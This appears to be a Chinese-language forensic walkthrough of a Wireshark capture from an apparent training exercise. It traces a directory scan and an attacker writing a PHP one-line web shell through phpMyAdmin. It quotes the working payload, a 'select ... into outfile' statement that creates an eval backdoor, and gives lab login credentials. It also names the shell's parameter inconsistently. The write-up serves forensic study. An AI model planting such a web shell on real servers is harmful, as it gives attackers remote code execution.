Wireshark分析:Bravo-1数据包中的恶意活动与目录扫描
需积分: 5 102 浏览量
更新于2024-08-04
收藏 2.1MB DOCX 举报
"03-详细解析过程-bravo-1.docx"
在网络安全和数据包分析领域,Wireshark是一款强大的工具,用于捕获和分析网络流量。在这个特定的任务中,我们关注的是一个名为"Bravo-1"的数据包文件,即"Bravo-1.pcapng"。该文件包含了一次渗透测试或模拟攻击的情景,其中渗透机是运行Windows7的系统,用户名为"administrator",密码为"123456"。
首先,我们需要找到恶意用户进行目录扫描时的第二个目录名。通过对数据包进行过滤并专注于HTTP流量,我们可以观察到"info"列中的目录列表,尤其是那些返回404 Not Found响应的请求。这通常意味着攻击者正在尝试访问不存在的路径。在本例中,找到的第二个目录名是"uploads",这可能是攻击者试图探测的潜在弱点。
接着,我们要确定恶意用户是如何写入一句话木马的。通过追踪TCP流,我们可以区分发送和接收的包。在绿色的接收包中,我们注意到与"phpmyadmin"相关的活动。通过分析数据包内容,特别是寻找POST请求,我们发现了一个SQL注入攻击的痕迹。攻击者使用了如下的SQL语句:
```sql
select '<?php@eval($_POST[cia]);?>' into outfile 'c:/phpstudy/www/m/shell2.php'
```
这表明恶意代码被写入了路径"c:/phpstudy/www/m/shell2.php"。此操作是通过访问"phpmyadmin"目录下的"server_sql.php"文件来完成的。执行的SQL语句会创建一个PHP文件,当接收到POST请求时,它会执行通过 cabbage 参数传递的任何PHP代码。
此外,还可以通过过滤器"http.request.method==POST"来查找可疑活动,这帮助我们找到了名为"shell2.php"的文件,其数据区包含了木马代码。另一个包显示了通过"/phpmyadmin/import.php"文件执行的SQL语句注入,也写入了木马文件。
"Bravo-1.pcapng"文件分析揭示了两个关键点:一是恶意用户使用目录扫描技术尝试访问"uploads"目录;二是攻击者利用SQL注入在"c:/phpstudy/www/m/"目录下写入了一句话木马"shell2.php",主要通过"phpmyadmin"目录的"server_sql.php"和"import.php"文件实现。这些信息对于理解网络攻击的模式以及防御策略至关重要。
175 浏览量
2019-09-18 上传
5life@home
- 粉丝: 0
- 资源: 5
最新资源
- WordPress作为新闻管理面板的实现指南
- NPC_Generator:使用Ruby打造的游戏角色生成器
- MATLAB实现变邻域搜索算法源码解析
- 探索C++并行编程:使用INTEL TBB的项目实践
- 玫枫跟打器:网页版五笔打字工具,提升macOS打字效率
- 萨尔塔·阿萨尔·希塔斯:SATINDER项目解析
- 掌握变邻域搜索算法:MATLAB代码实践
- saaraansh: 简化法律文档,打破语言障碍的智能应用
- 探索牛角交友盲盒系统:PHP开源交友平台的新选择
- 探索Nullfactory-SSRSExtensions: 强化SQL Server报告服务
- Lotide:一套JavaScript实用工具库的深度解析
- 利用Aurelia 2脚手架搭建新项目的快速指南
- 变邻域搜索算法Matlab实现教程
- 实战指南:构建高效ES+Redis+MySQL架构解决方案
- GitHub Pages入门模板快速启动指南
- NeonClock遗产版:包名更迭与应用更新